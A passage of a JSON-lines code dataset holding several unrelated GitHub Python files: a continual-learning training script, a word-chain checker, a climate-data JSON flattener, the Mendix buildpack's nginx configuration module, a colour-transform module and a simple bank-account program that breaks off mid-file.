train=True, label=True, num_label_data=args.labeled_samples, class_type=args.class_type, transform=train_transform, download=True)\n\n train_dataset_ul = Dataset(args.dataroot, train=True, label=False, num_label_data=args.labeled_samples, class_type=args.class_type, transform=train_transform, download=True)\n\n test_dataset = Dataset(args.dataroot, train=False, class_type=args.class_type, transform=test_transform, download=True)\n\n # in case tasks reset...\n tasks = train_dataset.tasks\n max_task = len(tasks)\n\n learner_config = {'num_classes': num_classes,\n 'model_type' : args.model_type,\n 'model_name' : args.model_name,\n 'epoch' : args.epoch,\n 'lr' : args.lr,\n 'momentum' : args.momentum,\n 'weight_decay' : args.weight_decay,\n 'num_task' : max_task,\n 'threshold' : args.threshold,\n 'memory' : args.memory,\n 'device' : args.device,\n 'logdir' : args.log_dir + '/logs/sscl_'\n }\n learner = learners.__dict__[args.learner_type].__dict__[args.learner_name](learner_config)\n\n\n for i in range(max_task):\n train_name = task_names[i]\n print('======================', train_name, '=======================')\n\n # load dataset for task\n task = tasks_logits[i]\n prev = sorted(set([k for task in tasks_logits[:i] for k in task]))\n\n train_dataset.load_dataset(prev, i, train=True)\n train_dataset_ul.load_dataset(prev, i, train=True)\n out_dim_add = len(task)\n\n # load dataloader\n train_loader_l = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, drop_last=False, num_workers=args.workers)\n train_loader_ul = DataLoader(train_dataset_ul, batch_size=args.ul_batch_size, shuffle=True, drop_last=False, num_workers=args.workers)\n\n test_dataset.load_dataset(prev, i, train=False)\n test_loader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False, drop_last=False, num_workers=args.workers)\n\n # add valid class for classifier\n model_save_dir = args.log_dir + '/models/task-'+task_names[i]+'/'\n if not os.path.exists(model_save_dir): os.makedirs(model_save_dir)\n\n learner.add_valid_output_dim(out_dim_add)\n learner.learn_batch(train_loader_l, train_loader_ul, model_save_dir)\n\n learner.validatioin(test_loader)\n\n learner.logger.writer('Total Training Accuracy', learner.total_train_acc.avg, 1)\n learner.logger.writer('Total Training OOD Accuracy', learner.total_ood_acc.avg, 1)\n learner.logger.writer('Total Validation Accuracy', learner.total_val_acc.avg, 1)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Semi-Supervised Continual Learning')\n\n # Standard Args\n parser.add_argument(\"--seed\", type=int, default=0, help='Set seed (default=0)')\n parser.add_argument(\"--device\", type=int, default=0, help='Set gpu id (default=0)')\n parser.add_argument(\"--dataset\", type=str, default='CIFAR100', help=\"CIFAR10|CIFAR100\")\n parser.add_argument(\"--log_dir\", type=str, default=\"outputs\", help=\"Save experiments results in dir for future plotting!\")\n parser.add_argument(\"--dataroot\", type=str, default='data', help=\"The root folder of dataset or downloaded data\")\n parser.add_argument(\"--workers\", type=int, default=4, help=\"#Thread for dataloader\")\n parser.add_argument('--model_type', type=str, default='tiny_model', help=\"The type tin_model of backbone network\")\n parser.add_argument('--model_name', type=str, default='Reduced_ResNet18', help=\"Reduced_ResNet18|mobilenet_v2\")\n parser.add_argument('--epoch', type=int, default=10)\n parser.add_argument('--lr', type=float, default=0.1, help=\"Learning rate\")\n parser.add_argument('--momentum', type=float, default=0.9)\n parser.add_argument('--weight_decay', type=float, default=5e-4)\n parser.add_argument('--threshold', type=float, default=0.5)\n parser.add_argument('--memory', type=int, default=400, help=\"size of memory for replay\")\n\n # SSCL Args\n parser.add_argument('--class_type', type=str, default='super', help=\"vanilla|super\")\n parser.add_argument('--rand_split', default=False, action='store_true', help=\"Randomize the classes in splits\")\n parser.add_argument('--batch_size', type=int, default=16)\n parser.add_argument('--learner_type', type=str, default='tiny_learner', help=\"The type (filename) of learner\")\n parser.add_argument('--learner_name', type=str, default='SSCL', help=\"The class name of learner\")\n parser.add_argument('--ul_batch_size', type=int, default=32)\n parser.add_argument('--labeled_samples', type=int, default=500, help='Number of labeled samples each task in ssl')\n parser.add_argument('--unlabeled_task_samples', type=int, default=-1, help='Number of unlabeled samples in each task in ssl')\n\n args = parser.parse_args()\n\n run(args)","repo_name":"hopo55/SSCL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11819960777","text":"def isWordChain(words):\n\tif len(words)<2:\n\t\treturn True\n\tprevious_word = words[0]\n\tfor i in range(1,len(words)):\n\t\tif is_levelshtein_1(previous_word, words[i]):\n\t\t\tprevious_word = words[i]\n\t\telse:\n\t\t\treturn False\n\treturn True\n\ndef is_levelshtein_1(a,b):\n\tlen_diff = len(a) - len(b)\n\tif len_diff > 1 or len_diff < -1:\n\t\treturn False\n\t\n\t#case 1\n\tif len_diff == 0:\n\t\tchange_count = 0\n\t\tfor i in range(len(a)):\n\t\t\tif a[i] == b[i]:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tchange_count = change_count+1\n\t\treturn change_count == 1\n\t\t\n\t#case 2\n\tif len_diff == 1:\n\t\tlonger = a\n\t\tshorter = b\n\telse:\n\t\tlonger = b\n\t\tshorter = a\n\tremove_char_found = 0\n\tfor i in range(len(shorter)):\n\t\tif shorter[i-remove_char_found] == longer[i]:\n\t\t\tcontinue\n\t\telse:\n\t\t\tremove_char_found = remove_char_found+1\n\treturn remove_char_found <2\n","repo_name":"ASHISH-KUMAR-PANDEY/python","sub_path":"word_challenge.py","file_name":"word_challenge.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"41764467662","text":"#!/usr/bin/env python\n# Thomas Reerink\n#\n# This script converts a component json file produced by genecec including the preferences\n# into a flat json without the component structue (ifs, nemo, lpjg & tm5) such that it can be\n# read with: checkvars -v --asciionly --drq flat-json-file.json --output request-overview\n#\n# Note that when a flat json file is given (instead of a component json file) the produced json\n# file will be just equal to the input flat json file.\n#\n# Run this script without arguments for examples how to call this script.\n#\n# This script is part of the subpackage genecec (GENerate EC-Eearth Control output files)\n# which is part of ece2cmor3.\n\n\nimport sys\nimport os\nimport json\n\nerror_message = '\\n \\033[91m' + 'Error:' + '\\033[0m' # Red error message\nwarning_message = '\\n \\033[93m' + 'Warning:' + '\\033[0m' # Yellow warning message\n\n# Main program\ndef main():\n\n if len(sys.argv) == 2:\n\n input_json_file = sys.argv[1] # Reading the data request file name from the argument line\n if os.path.isfile(input_json_file) == False: # Checking if the data request file exists\n print(error_message, ' The data request file ', input_json_file, ' does not exist.\\n')\n sys.exit()\n\n with open(input_json_file) as json_file:\n data_request = json.load(json_file)\n json_file.close()\n\n output_json_file = os.path.basename(input_json_file).replace('.json','-flat.json')\n\n print('\\n Running {:} with:\\n {:} {:}\\n'.format(os.path.basename(sys.argv[0]), os.path.basename(sys.argv[0]), sys.argv[1]))\n\n # Check whether the input json file is a component json or a flat json file:\n if \"ifs\" in data_request:\n ifs_request = data_request[\"ifs\"]\n nemo_request = data_request[\"nemo\"]\n lpjg_request = data_request[\"lpjg\"]\n tm5_request = data_request[\"tm5\"]\n\n\n # Determine whether a same table is present in the nemo dictionary as in the ifs dictionary:\n for x in nemo_request:\n if x in ifs_request:\n for i in range(0, len(nemo_request[x])):\n ifs_request[x].append(nemo_request[x][i])\n else:\n ifs_request.update({x: nemo_request[x]})\n\n # Determine whether a same table is present in the lpjg dictionary as in the ifs dictionary:\n for x in lpjg_request:\n if x in ifs_request:\n for i in range(0, len(lpjg_request[x])):\n ifs_request[x].append(lpjg_request[x][i])\n else:\n ifs_request.update({x: lpjg_request[x]})\n\n # Determine whether a same table is present in the tm5 dictionary as in the ifs dictionary:\n for x in tm5_request:\n if x in ifs_request:\n for i in range(0, len(tm5_request[x])):\n ifs_request[x].append(tm5_request[x][i])\n else:\n ifs_request.update({x: tm5_request[x]})\n\n with open(output_json_file, 'w') as outfile:\n json.dump(ifs_request, outfile, sort_keys=True, indent=4)\n outfile.close()\n\n else:\n print(warning_message, 'The file', sys.argv[1], 'is a flat json already, thefore it is not converted but copied instead.')\n command = 'rsync -a ' + input_json_file + ' ' + output_json_file\n os.system(command)\n\n command = 'sed -i \"s/\\s*$//g\"' + ' ' + output_json_file\n os.system(command)\n\n print(' which produced the file:')\n print(' ', output_json_file)\n print()\n\n else:\n print()\n print(' This scripts requires one argument, a json file, e.g.:')\n print(' ', os.path.basename(sys.argv[0]), '~/cmorize/control-output-files/output-control-files-v196/cmip6/CMIP/EC-EARTH-AOGCM/cmip6-experiment-CMIP-historical/cmip6-data-request-varlist-CMIP-historical-EC-EARTH-AOGCM.json')\n print(' ', os.path.basename(sys.argv[0]), '../resources/miscellaneous-data-requests/lamaclima/lamaclima-data-request-varlist-EC-EARTH-Veg.json')\n print(' ', os.path.basename(sys.argv[0]), '~/cmorize/control-output-files/output-control-files-v196/cmip6/AerChemMIP/cmip6-experiment-AerChemMIP-hist-1950HC/cmip6-data-request-varlist-AerChemMIP-hist-1950HC-EC-EARTH-AerChem.json')\n print()\n\nif __name__ == \"__main__\":\n main()\n\n\n# Validation:\n#\n# non_flat_json=~/cmorize/control-output-files/output-control-files-v196/cmip6/CMIP/EC-EARTH-AOGCM/cmip6-experiment-CMIP-historical/cmip6-data-request-varlist-CMIP-historical-EC-EARTH-AOGCM.json\n# flat_json=cmip6-data-request-varlist-CMIP-historical-EC-EARTH-AOGCM-flat.json\n# non_flat_json=../resources/miscellaneous-data-requests/lamaclima/lamaclima-data-request-varlist-EC-EARTH-Veg.json\n# flat_json=lamaclima-data-request-varlist-EC-EARTH-Veg-flat.json\n# non_flat_json=~/cmorize/control-output-files/output-control-files-v196/cmip6/AerChemMIP/cmip6-experiment-AerChemMIP-hist-1950HC/cmip6-data-request-varlist-AerChemMIP-hist-1950HC-EC-EARTH-AerChem.json\n# flat_json=cmip6-data-request-varlist-AerChemMIP-hist-1950HC-EC-EARTH-AerChem-flat.json\n# \n# more ${flat_json} | grep -v -e '}' -e '{' -e ']' -e '\\[' | sort > sorted-flat.txt\n# more ${non_flat_json} | grep -v -e '}' -e '{' -e ']' -e '\\[' | sort > sorted-non-flat.txt\n# wc sorted-non-flat.txt; wc sorted-flat.txt\n# diff -b sorted-non-flat.txt sorted-flat.txt\n# \n# rm -f cmip6-data-request-varlist-CMIP-historical-EC-EARTH-AOGCM-flat.json lamaclima-data-request-varlist-EC-EARTH-Veg-flat.json cmip6-data-request-varlist-AerChemMIP-hist-1950HC-EC-EARTH-AerChem-flat.json sorted-flat.txt sorted-non-flat.txt\n","repo_name":"EC-Earth/ece2cmor3","sub_path":"ece2cmor3/scripts/convert_component_to_flat_json.py","file_name":"convert_component_to_flat_json.py","file_ext":"py","file_size_in_byte":5564,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"38550108715","text":"import crypt\nimport json\nimport logging\nimport os\nimport re\nimport shutil\nimport subprocess\nfrom dataclasses import dataclass\n\nfrom buildpack import util\nfrom buildpack.core import runtime, security\nfrom jinja2 import Template\nfrom lib.m2ee.version import MXVersion\nfrom lib.m2ee.util import strtobool\n\nALLOWED_HEADERS = {\n \"X-Frame-Options\": r\"(?i)(^allow-from https?://([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]{0,61}[a-zA-Z0-9])(\\.([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]{0,61}[a-zA-Z0-9]))*(:\\d+)?$|^deny$|^sameorigin$)\", # noqa: line-too-long\n \"Referrer-Policy\": r\"(?i)(^no-referrer$|^no-referrer-when-downgrade$|^origin|origin-when-cross-origin$|^same-origin|strict-origin$|^strict-origin-when-cross-origin$|^unsafe-url$)\", # noqa: line-too-long\n \"Access-Control-Allow-Origin\": r\"(?i)(^\\*$|^null$|^https?://([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]{0,61}[a-zA-Z0-9])(\\.([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]{0,61}[a-zA-Z0-9]))*(:\\d+)?$)\", # noqa: line-too-long\n \"X-Content-Type-Options\": r\"(?i)(^nosniff$)\",\n \"Content-Security-Policy\": r\"[a-zA-Z0-9:;/''\\\"\\*_\\- \\.\\n?=%&+]+\",\n \"Strict-Transport-Security\": r\"(?i)(^max-age=[0-9]*$|^max-age=[0-9]*; includeSubDomains$|^max-age=[0-9]*; preload$)\", # noqa: line-too-long\n \"X-Permitted-Cross-Domain-Policies\": r\"(?i)(^all$|^none$|^master-only$|^by-content-type$|^by-ftp-filename$)\", # noqa: line-too-long\n \"X-XSS-Protection\": r\"(?i)(^0$|^1$|^1; mode=block$|^1; report=https?://([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]{0,61}[a-zA-Z0-9])(\\.([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\-]{0,61}[a-zA-Z0-9]))*(:\\d+)?$)\", # noqa: line-too-long\n}\n\nCONFIG_FILE = \"nginx/conf/nginx.conf\"\nPROXY_FILE = \"nginx/conf/proxy_params\"\n\nDEFAULT_REQUEST_HANDLER_PATHS = [\n \"/p/\",\n \"/rest-doc/\",\n \"/link/\",\n \"/api-doc/\",\n \"/odata-doc/\",\n \"/ws-doc/\",\n]\nFILE_HANDLER_PATH = \"/file\"\nDEFAULT_LOCATION_PATHS = [\"/\", FILE_HANDLER_PATH]\nMXADMIN_PATH = \"/_mxadmin/\"\nCLIENT_CERT_CHECK_INTERNAL_PATH_PREFIX = \"/client-cert-check-internal\"\nRESERVED_PATH_PREFIXES = [MXADMIN_PATH, CLIENT_CERT_CHECK_INTERNAL_PATH_PREFIX]\n\n# Fix for Chrome SameSite enforcement (from Chrome 80 onwards)\n# Runtime will set this cookie\n# in runtime versions >= SAMESITE_COOKIE_WORKAROUND_LESS_MX_VERSION\ndef _is_samesite_cookie_workaround_enabled(mx_version):\n SAMESITE_COOKIE_WORKAROUND_ENV_KEY = \"SAMESITE_COOKIE_PRE_MX812\"\n SAMESITE_COOKIE_WORKAROUND_DEFAULT = False\n SAMESITE_COOKIE_WORKAROUND_LESS_MX_VERSION = \"8.12\"\n\n try:\n return strtobool(\n os.environ.get(\n SAMESITE_COOKIE_WORKAROUND_ENV_KEY,\n str(SAMESITE_COOKIE_WORKAROUND_DEFAULT),\n )\n ) and mx_version < MXVersion(SAMESITE_COOKIE_WORKAROUND_LESS_MX_VERSION)\n except (ValueError, AttributeError):\n logging.warning(\n \"Invalid value for [%s], disabling SameSite cookie workaround\",\n SAMESITE_COOKIE_WORKAROUND_ENV_KEY,\n )\n return False\n\n\ndef _is_custom_nginx():\n return bool(\"NGINX_CUSTOM_BIN_PATH\" in os.environ)\n\n\ndef stage(buildpack_path, build_path, cache_path):\n logging.debug(\"Staging nginx...\")\n shutil.copytree(\n os.path.join(buildpack_path, \"etc/nginx\"),\n os.path.join(build_path, \"nginx\"),\n )\n\n if not _is_custom_nginx():\n logging.debug(\"Downloading nginx...\")\n util.resolve_dependency(\n \"nginx\",\n os.path.join(build_path, \"nginx\"),\n buildpack_dir=buildpack_path,\n cache_dir=cache_path,\n )\n else:\n logging.debug(\"Custom nginx path provided, nginx will not be downloaded\")\n\n\ndef update_config():\n samesite_cookie_workaround_enabled = _is_samesite_cookie_workaround_enabled(\n runtime.get_runtime_version()\n )\n if samesite_cookie_workaround_enabled:\n logging.info(\"SameSite cookie workaround is enabled\")\n\n # Populating nginx config template\n output_path = os.path.abspath(CONFIG_FILE)\n template_path = os.path.abspath(f\"{CONFIG_FILE}.j2\")\n\n with open(template_path, \"r\") as file_:\n template = Template(file_.read(), trim_blocks=True, lstrip_blocks=True)\n rendered = template.render(\n samesite_cookie_workaround_enabled=samesite_cookie_workaround_enabled,\n locations=_get_locations(),\n default_headers=_get_http_headers(),\n nginx_keepalive_timeout=_get_nginx_keepalive_timeout(),\n nginx_port=str(util.get_nginx_port()),\n runtime_port=str(util.get_runtime_port()),\n admin_port=str(util.get_admin_port()),\n root=os.getcwd(),\n mxadmin_path=MXADMIN_PATH,\n client_cert_check_internal_path_prefix=CLIENT_CERT_CHECK_INTERNAL_PATH_PREFIX,\n )\n\n logging.debug(\"Writing nginx configuration file...\")\n with open(output_path, \"w\") as file_:\n file_.write(rendered)\n logging.debug(\"nginx configuration file written\")\n\n # Populating proxy params template\n output_path = os.path.abspath(PROXY_FILE)\n template_path = os.path.abspath(f\"{PROXY_FILE}.j2\")\n\n with open(template_path, \"r\") as file_:\n template = Template(file_.read(), trim_blocks=True, lstrip_blocks=True)\n rendered = template.render(\n proxy_buffers=_get_proxy_buffers(),\n proxy_buffer_size=_get_proxy_buffer_size(),\n )\n\n logging.debug(\"Writing proxy_params configuration file...\")\n with open(output_path, \"w\") as file_:\n file_.write(rendered)\n logging.debug(\"proxy_params configuration file written\")\n\n _generate_password_file({\"MxAdmin\": security.get_m2ee_password()})\n\n\ndef _get_nginx_keepalive_timeout():\n return os.environ.get(\"NGINX_KEEPALIVE_TIMEOUT\", \"100\")\n\n\ndef _get_proxy_buffer_size():\n return os.environ.get(\"NGINX_PROXY_BUFFER_SIZE\", None)\n\n\ndef _get_proxy_buffers():\n return os.environ.get(\"NGINX_PROXY_BUFFERS\", None)\n\n\n# Access restriction configuration\n# Example:\n# {\n# \"/\":\n# {'ipfilter': ['10.0.0.0/8'], 'client_cert': true, 'satisfy': 'any'},\n# \"/ws/MyWebService/\":\n# {'ipfilter': ['10.0.0.0/8'], 'client_cert': true, 'satisfy': 'all'},\n# \"/CustomRequestHandler/\":\n# {'ipfilter': ['10.0.0.0/8']},\n# \"/CustomRequestHandler2/\":\n# {'basic_auth': {'user1': 'password', 'user2': 'password2'}},\n# }\ndef _get_access_restrictions():\n return json.loads(os.environ.get(\"ACCESS_RESTRICTIONS\", \"{}\"))\n\n\n# Custom location configuration\n# Example:\n# {\n# \"/some_location\", {\"body\": \"set $something $other;\"},\n# }\ndef _get_custom_locations():\n return json.loads(os.environ.get(\"NGINX_CUSTOM_LOCATIONS\", \"{}\"))\n\n\ndef _get_http_headers():\n headers_from_json = {}\n\n # this is kept for X-Frame-Options backward compatibility\n x_frame_options = os.environ.get(\"X_FRAME_OPTIONS\", \"ALLOW\")\n if x_frame_options != \"ALLOW\":\n headers_from_json[\"X-Frame-Options\"] = x_frame_options\n\n headers_json = os.environ.get(\"HTTP_RESPONSE_HEADERS\", \"{}\")\n\n try:\n headers_from_json.update(json.loads(headers_json))\n except Exception:\n logging.error(\n \"Failed to parse HTTP_RESPONSE_HEADERS due to invalid JSON string: '%s'\",\n headers_json,\n )\n raise\n\n result = []\n for header_key, header_value in headers_from_json.items():\n regex = ALLOWED_HEADERS[header_key]\n if regex and re.match(regex, header_value):\n escaped_value = header_value.replace('\"', '\\\\\"').replace(\"'\", \"\\\\'\")\n result.append((header_key, escaped_value))\n logging.debug(\n \"Added header %s '%s' to nginx config\", header_key, header_value\n )\n else:\n logging.warning(\n \"Skipping %s config, value '%s' is not valid\", header_key, header_value\n )\n\n return result\n\n\ndef _get_nginx_bin_path():\n nginx_bin_path = os.environ.get(\"NGINX_CUSTOM_BIN_PATH\", \"nginx/sbin/nginx\")\n return nginx_bin_path\n\n\ndef run():\n nginx_process = subprocess.Popen(\n [\n _get_nginx_bin_path(),\n \"-p\",\n \"nginx\",\n \"-c\",\n str(os.path.abspath(CONFIG_FILE)),\n ]\n )\n return nginx_process\n\n\ndef _generate_password_file(users_passwords, file_name_suffix=\"\"):\n with open(\"nginx/.htpasswd\" + file_name_suffix, \"w\") as file_handler:\n for user, password in users_passwords.items():\n if not password:\n file_handler.write(\"\\n\")\n else:\n file_handler.write(\n f\"{user}:\"\n f\"{crypt.crypt(password, crypt.mksalt(crypt.METHOD_SHA512))}\\n\"\n )\n\n\n@dataclass\nclass Location:\n path: str = None\n body: str = None\n index: int = 0\n\n # Proxy parameters\n proxy_buffering_enabled: bool = True\n proxy_intercept_errors_enabled: bool = False\n\n # Access restriction parameters\n satisfy: str = \"any\"\n ipfilter_ips: list = None\n basic_auth_enabled: bool = False\n client_cert_enabled: bool = False\n issuer_dn_regex: str = None\n issuer_dn: str = None\n\n\n# Adds a \"/\" after a path for comparison\n# This is required to check if a path is indeed a subpath of another path\ndef _get_slashed_path(path):\n return path if path.endswith(\"/\") else path + \"/\"\n\n\n# Gets the location configuration for the most specific path that matches the path\n# This is required to ensure that \"nested\" locations\n# have the same configuration as their parent\ndef _get_most_specific_location_config(path, locations):\n sorted_paths = sorted(locations.keys())\n sorted_paths.reverse()\n for sorted_path in sorted_paths:\n if _is_subpath_of(path, sorted_path):\n return locations[sorted_path]\n return {}\n\n\n# Returns if a path is a subpath of others\n# others can be a string or collection of strings\ndef _is_subpath_of(path, others):\n if isinstance(others, str):\n return path == others or path.startswith(_get_slashed_path(others))\n return any(_is_subpath_of(path, p) for p in others)\n\n\ndef _get_locations(\n access_restrictions=_get_access_restrictions(),\n custom_locations=_get_custom_locations(),\n):\n locations = {**custom_locations, **access_restrictions}\n\n # Add default locations\n for default_path in DEFAULT_LOCATION_PATHS:\n locations[default_path] = _get_most_specific_location_config(\n default_path, locations\n )\n\n # Get request handlers and determine which request handlers are \"dynamic\",\n # i.e. most likely for an API, e.g. REST\n dynamic_handler_paths = []\n request_handlers = runtime.get_metadata_value(\"RequestHandlers\")\n if request_handlers is not None:\n paths = [handler[\"Name\"] for handler in request_handlers]\n dynamic_handler_paths = list(set(paths) - set(DEFAULT_REQUEST_HANDLER_PATHS))\n\n # Add dynamic request handler locations\n for dynamic_handler_path in dynamic_handler_paths:\n locations[\n _get_slashed_path(dynamic_handler_path)\n ] = _get_most_specific_location_config(dynamic_handler_path, locations)\n\n # Get REST request handlers from metadata and add locations\n rest_handler_paths = []\n try:\n rest_handler_paths = runtime.get_rest_request_handler_paths()\n for rest_handler_path in rest_handler_paths:\n locations[\n _get_slashed_path(rest_handler_path)\n ] = _get_most_specific_location_config(rest_handler_path, locations)\n except Exception as exc:\n logging.error(\"Cannot get REST handlers from model: %s\", exc)\n\n # Convert dictionary into list of locations\n index = 0\n result = []\n\n for path, config in locations.items():\n location = Location()\n location.path = path\n location.index = index\n\n # Reserved path prefixes are restricted\n if any(path.startswith(prefix) for prefix in RESERVED_PATH_PREFIXES):\n raise Exception(f\"Can not override location on reserved path [{path}]\")\n\n # If body is set and is only element, assume custom location\n if len(config) == 1 and \"body\" in config:\n location.body = config[\"body\"]\n\n # Else, assume access restriction\n else:\n # Disable proxy buffering for files\n if path == FILE_HANDLER_PATH:\n location.proxy_buffering_enabled = False\n\n # Enable error interception for default runtime paths\n # This is required for custom error pages\n if (\n _is_subpath_of(path, DEFAULT_REQUEST_HANDLER_PATHS)\n or path in DEFAULT_LOCATION_PATHS\n ):\n location.proxy_intercept_errors_enabled = True\n\n # Explicitly disable error interception for dynamic request handlers\n # This is not strictly required (default is disabled)\n # but it might be in the future\n if _is_subpath_of(path, dynamic_handler_paths) or _is_subpath_of(\n path, rest_handler_paths\n ):\n location.proxy_intercept_errors_enabled = False\n\n # Add the access restrictions configuration\n # \"Satisfy\" specifies if restrictions should be\n # evaluated as \"AND\" (all) or \"OR\" (any)\n if \"satisfy\" in config:\n if config[\"satisfy\"] in [\"any\", \"all\"]:\n location.satisfy = config[\"satisfy\"]\n else:\n raise Exception(f\"Invalid satisfy value: {config['satisfy']}\")\n\n # Add IP filter configuration\n if \"ipfilter\" in config:\n location.ipfilter_ips = []\n for ip in config[\"ipfilter\"]:\n location.ipfilter_ips.append(ip)\n\n # Add HTTP basic auth configuration\n if \"basic_auth\" in config:\n location.basic_auth_enabled = True\n _generate_password_file(config[\"basic_auth\"], str(index))\n\n # Add client certificate configuration\n if config.get(\"client-cert\") or config.get(\"client_cert\"):\n location.client_cert_enabled = True\n\n # Add \"Issuer DN\" check for the client certificate chain.\n # The required header is passed on from an upstream proxy,\n # which in the case of Mendix Cloud is the Front-Facing Fleet\n # This scenario isn't covered by integration tests.\n # Please test manually if Nginx is properly matching the\n # SSL-Client-I-DN HTTP header with the configuration\n # in the ACCESS_RESTRICTIONS environment variable.\n if \"issuer_dn\" in config:\n location.issuer_dn_regex = \"\"\n location.issuer_dn = \"\"\n for i in config[\"issuer_dn\"]:\n # Workaround for missing identifier strings from Java\n # This should be fixed in upstream code by using\n # different certificate libraries\n issuer = i.replace(\"OID.2.5.4.97\", \"organizationIdentifier\")\n\n location.issuer_dn += f\"{issuer}|\"\n\n # Escape special characters\n issuer = issuer.replace(\" \", \"\\\\040\")\n issuer = issuer.replace(\".\", \"\\\\.\")\n issuer = issuer.replace(\"'\", \"\\\\'\")\n\n location.issuer_dn_regex += f\"{issuer}|\"\n location.issuer_dn = location.issuer_dn[:-1]\n location.issuer_dn_regex = location.issuer_dn_regex[:-1]\n\n result.append(location)\n index += 1\n\n return result\n","repo_name":"mendix/cf-mendix-buildpack","sub_path":"buildpack/core/nginx.py","file_name":"nginx.py","file_ext":"py","file_size_in_byte":15499,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"48"} +{"seq_id":"73169054864","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport matplotlib.pyplot as plt\n\n\nclass ColorTransform(nn.Module):\n def __init__(self, para_path):\n super(ColorTransform, self).__init__()\n file = np.load(para_path, allow_pickle=True)\n self.degree = file['d']\n weight = torch.from_numpy(file['weight'])\n bias = torch.from_numpy(file['bias'])\n self.register_buffer('weight', weight)\n self.register_buffer('bias', bias)\n\n def poly_feature(self, x, degree=None):\n if degree is None:\n degree = self.degree\n n = x.shape[1]\n feature = [x.clone()]\n index = list(range(n))\n for d in range(1, degree):\n new = []\n k = 0\n for i in range(n):\n new.append(x[:, i:i + 1] * feature[-1][:, index[i]:])\n index[i] = k\n k = k + new[-1].shape[1]\n new = torch.cat(new, 1)\n feature.append(new)\n feature = torch.cat(feature, 1)\n return feature\n\n def forward(self, x):\n f = self.poly_feature(x)\n f = f.transpose(1, -1)\n # pred = (f.unsqueeze(1) * weight.unsqueeze(0)).sum(2) + bias\n pred = torch.matmul(f, self.weight) + self.bias\n pred = pred.transpose(1, -1)\n return pred","repo_name":"WhoTHU/Adversarial_camou","sub_path":"color_util.py","file_name":"color_util.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"44159428461","text":"from random import randint\r\n\r\n\r\nclass Account:\r\n balance = (randint(1000, 20000))\r\n\r\n def __init__(self, Name, Ac, Ac_type):\r\n self.name = Name\r\n self.ac = Ac\r\n self.type = Ac_type\r\n\r\n def deposit(self, Amount):\r\n print(\"Successfully Deposited\")\r\n self.balance += Amount\r\n\r\n def withdraw(self, Amount):\r\n print(\"Withdrawal Successful\")\r\n self.balance -= Amount\r\n\r\n\r\nclass FixDeposit(Account):\r\n fd_rate = 6.4\r\n\r\n def __init__(self, Fd_amt):\r\n super().__init__(name, ac, Type)\r\n self.fd_amt = Fd_amt\r\n\r\n def cal_fd(self):\r\n si = (self.fd_amt * self.fd_rate * 10) / 100\r\n print(\"Final Amount After 10 years is : \", si + self.fd_amt)\r\n\r\n def display_fd(self):\r\n print(\"---------------------------------------\")\r\n print(\"Name : \", self.name)\r\n print(\"A/c No. :- \", self.ac)\r\n print(\"A/c Type: \", self.type)\r\n print(\"Balance: \", self.balance)\r\n print(\"FD Amount: \", self.fd_amt)\r\n print(\"Fix Deposit Successfully Created......\")\r\n\r\n\r\nclass Loan(Account):\r\n loan_rate = 8.5\r\n\r\n def __init__(self, Loan_amt):\r\n super().__init__(name, ac, Type)\r\n self.loan_amt = Loan_amt\r\n\r\n def cal_loan(self):\r\n si = (self.loan_amt * self.loan_rate * 10) / 100\r\n print(\"Final Amount After 10 years is : \", si + self.loan_amt)\r\n\r\n def display_loan(self):\r\n print(\"---------------------------------------\")\r\n print(\"Name : \", self.name)\r\n print(\"A/c No. :- \", self.ac)\r\n print(\"A/c Type: \", self.type)\r\n print(\"Balance: \", self.balance)\r\n print(\"Loan Amount: \", self.loan_amt)\r\n if self.type.lower() == \"saving\" and self.balance > 5000:\r\n print(\"Loan Successfully Granted......\")\r\n else:\r\n print(\"Sorry..unable to grant you a loan\")\r\n\r\n\r\nprint(\"---------------- Bank Of Baroda----------------\")\r\nname = input(\"Enter Ur Name: \")\r\nac = int(input(\"Enter Ur A/c No. :- \"))\r\nType = input(\"Enter Account Type:- \")\r\nif not len(str(ac)) == 14:\r\n exit(0)\r\n\r\nprint(\"\\n1) View or Update Balance \\n2) Fix Deposit \\n3) Loan \\n4) Exit \")\r\nselection = int(input(\"\\nEnter your selection: \"))\r\n\r\nAcc = Account(name, ac, Type)\r\n\r\nif selection == 1:\r\n print(\"Current Balance: \", Acc.balance)\r\n print(\" 1)Add Amount\\n 2)Withdraw Amount\\n 3)Exit\")\r\n choice = int(input(\"Enter Ur Choice: \"))\r\n amount = int(input(\"Enter ur Amount : \"))\r\n if choice == 1:\r\n Acc.deposit(amount)\r\n print(\"New Balance: \", Acc.balance)\r\n elif choice == 2:\r\n if amount < Acc.balance:\r\n Acc.withdraw(amount)\r\n else:\r\n print(\"Insufficient Balance\")\r\n\r\n print(\"New Balance: \", Acc.balance)\r\n elif choice == 3:\r\n exit(0)\r\n else:\r\n print(\"Invalid Input\")\r\n\r\nelif selection == 2:\r\n fd_amt = int(input(\"Enter Ur FD Amount: \"))\r\n fd = FixDeposit(fd_amt)\r\n print(\" 1)Add This Amount Externally\\n 2)Deduct This Amount From Ur Current Balance\")\r\n choice = int(input(\"Enter Ur Choice: \"))\r\n\r\n print(\"Balance: \", fd.balance)\r\n if choice == 1:\r\n print(fd_amt)\r\n\r\n elif choice == 2:\r\n if fd_amt < fd.balance:\r\n fd.withdraw(fd_amt)\r\n 